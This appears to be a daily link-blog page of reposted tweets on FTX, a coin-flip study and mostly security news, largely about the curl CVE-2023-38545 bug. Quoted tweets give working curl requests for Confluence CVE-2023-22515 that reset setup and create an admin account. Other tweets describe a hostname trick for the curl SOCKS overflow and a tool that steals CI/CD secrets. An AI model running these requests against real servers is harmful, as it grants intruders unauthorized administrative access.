October 12, 2023
October 12, 2023
starting to think some of these courtroom sketch artists lost money on FTX pic.twitter.com/36hzJkzaqa
— Molly White (@molly0xFFF) October 11, 2023
here I was hoping for the cURL bug to be something useful to upgrade a SSRF to have new superpowers or something similar. 🙃
— blasty (@bl4sty) October 11, 2023
good luck exploiting this heap overflow on a modern-ish libc in a remote context with valid hostname characters for the trigger
Textbook deception. “In calls, Hamas operatives, who talked to each other when tapped by Israeli intelligence agents, also gave the sense that they sought to avoid another war with Israel so soon after a damaging two-week conflict in May 2021” https://t.co/CsvpkEblQd
— Shashank Joshi (@shashj) October 11, 2023
https://securitylab.amnesty.org/latest/2023/10/technical-deep-dive-into-intellexa-alliance-surveillance-products/
Apparently every business, not just mobile games, is supported by whales.
1/ Just caught up with a few investor friends in the consumer space last week about Ozempic and GLP1s
— Corry Wang (@corry_wang) October 11, 2023
As far as I can tell, everything basically hinges on: how much does it matter that every consumer product in the world depends on a tiny cohort of super consumers?
Thread by @corry_wang on Thread Reader App – Thread Reader App
@corry_wang: 1/ Just caught up with a few investor friends in the consumer space last week about Ozempic and GLP1s As far as I can tell, everything basically hinges on: how much does it matter that...…
Imagine going on a date with someone holding a fish in their dating profile picture and when you get to the restaurant it’s just a salmon sitting there waiting
— Missy Martinez (@MissyXMartinez) August 11, 2023
https://curlconverter.com/go/
Guide to setting up a hardware hacking lab for noobs by @wrongbaudhttps://t.co/IqO6XJYW4A
— Dreg (@therealdreg) October 10, 2023
This is the only good idea I’ve seen so far for the curl bug.
"On finding a too long host name. the curl code makes the bad decision to instead switch over to local resolve mode"
— Juliano Rizzo (@julianor) October 11, 2023
👀 curl with TOR de-anonymization potential (e.g., HTTP redirect to long host name)? https://t.co/W18pYGNkPt
CISA issues warning that people are still using Adobe Acrobat Reader! https://t.co/YWjdML4VkJ
— thaddeus e. grugq thegrugq@infosec.exchange (@thegrugq) October 11, 2023
Fair coins tend to land on the same side they started: Evidence from 350,757 flips
It’s about 51%
[2310.04153] Fair coins tend to land on the same side they started: Evidence from 350,757 flips
Many people have flipped coins but few have stopped to ponder the statistical and physical intricacies of the process. In a preregistered study we collected 350,757 coin flips to test the counterintuitive prediction from a physics model of human coin tossing developed by Diaconis, Holmes, and Montgomery (D-H-M; 2007). The model asserts that when people flip an ordinary coin, it tends to land on the same side it started -- D-H-M estimated the probability of a same-side outcome to be about 51%. Our data lend strong support to this precise prediction: the coins landed on the same side more often than not, $\text{Pr}(\text{same side}) = 0.508$, 95% credible interval (CI) [$0.506$, $0.509$], $\text{BF}{\text{same-side bias}} = 2364$. Furthermore, the data revealed considerable between-people variation in the degree of this same-side bias. Our data also confirmed the generic prediction that when people flip an ordinary coin -- with the initial side-up randomly determined -- it is equally likely to land heads or tails: $\text{Pr}(\text{heads}) = 0.500$, 95% CI [$0.498$, $0.502$], $\text{BF}{\text{heads-tails bias}} = 0.183$. Furthermore, this lack of heads-tails bias does not appear to vary across coins. Our data therefore provide strong evidence that when some (but not all) people flip a fair coin, it tends to land on the same side it started. Our data provide compelling statistical support for D-H-M physics model of coin tossing.
We kinda feared this might be coming https://t.co/g2G9gpKsIX
— Niao Collective (@NiaoCollective) October 11, 2023
Whomst Up Hollabacking They Curls? pic.twitter.com/jam0yl4asx
— @netspooky@haunted.computer (@netspooky) October 11, 2023
PoC for CVE-2023-22515: curl -k -X POST -H "X-Atlassian-Token: no-check" --data-raw "username=adm1n&fullName=admin&email=admin@confluence&password=adm1n&confirm=adm1n&setup-next-button=Next" http://confluence/setup/setupadministrator.action
— Nicolas Krassas (@Dinosn) October 11, 2023
(login with adm1n/adm1n)
This is not a standalone PoC for this vuln at all. It won't work unless you first flip the setupComplete bool to false via a request like:
— Erik Wynter (@Wynter@infosec.exchange) (@WynterErik) October 11, 2023
curl -vk http://: /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false
Source: https://t.co/FvTITdWFC0
curl CVE-2023-38545 can be used to partially control the SOCKS conversation. Given a hostname of:
— xchg justin,justin (@justinsteven) October 12, 2023
h + PP + padding
Where h is a hostname, PP is a network order short representing a port, and the total length mod 256 is the length of h, this will result in a connection to h:PP
Due to an overflow in the one-byte hostname length field, the client will resolve h and connect to its PP via the proxy. It will send the padding followed by the usual request.
— xchg justin,justin (@justinsteven) October 12, 2023
h, PP and padding must be DNS-safe bytes
This could have SSRF or privacy impact perhaps? ¯_(ツ)_/¯
Note that the second picture is a listener running on the SOCKS proxy itself, as in this case h == "localhost", which will be taken from the perspective of my SOCKS proxy and for which my proxy allows clients to connect to pic.twitter.com/K5vljZvSbq
— xchg justin,justin (@justinsteven) October 12, 2023
On deanonymisation.
I was wondering that. The SOCKS proxy remains responsible for the resolution and connection, so if the proxy is Tor and it’s well behaved there shouldn’t be an impact? I don’t know enough about Tor deanonymisation though. It’s definitely worth considering.
— xchg justin,justin (@justinsteven) October 12, 2023
https://daniel.haxx.se/blog/2023/10/11/how-i-made-a-heap-overflow-in-curl/
Will be soon releasing a tool that will allow you to play with macOS libmalloc allocators. So you can, um, find strange patterns. pic.twitter.com/E1EMrH1t5e
— Josh Pitts (@ausernamedjosh) October 11, 2023
My presentation video in BlackHat Asia 2023. Hope you like it!😄❤️@BlackHatEvents https://t.co/6MoD7H7Dne
— pyn3rd (@pyn3rd) October 9, 2023
⚗️ nord-stream
— Marco Lancini (@lancinimarco) October 11, 2023
Nord Stream is a tool that allows you to extract secrets stored inside CI/CD environments by deploying malicious pipelines. It currently supports Azure DevOps, GitHub and GitLab.https://t.co/dNIM9JMqs1
https://www.sfgate.com/bayarea/article/bart-seat-slasher-hurwitz-service-systems-inc-14544785.php
New: European standards body that created secret TETRA encryption algorithms used in police/military radios is talking about making new algorithms public, following intense backlash after researchers found severe security flaws in its old secret algorithms https://t.co/YbgJKuLRS5
— Kim Zetter (@KimZetter) October 11, 2023
Caroline Ellison of FTX admits that Sam bribed Chinese officials with $100M to unfreeze their assets, purposely tried to scam Saudi investors in the final days of FTX, intentionally tried to sic regulators on Binance to destroy his competition, and it's only lunchtime.
— Autism Capital 🧩 (@AutismCapital) October 11, 2023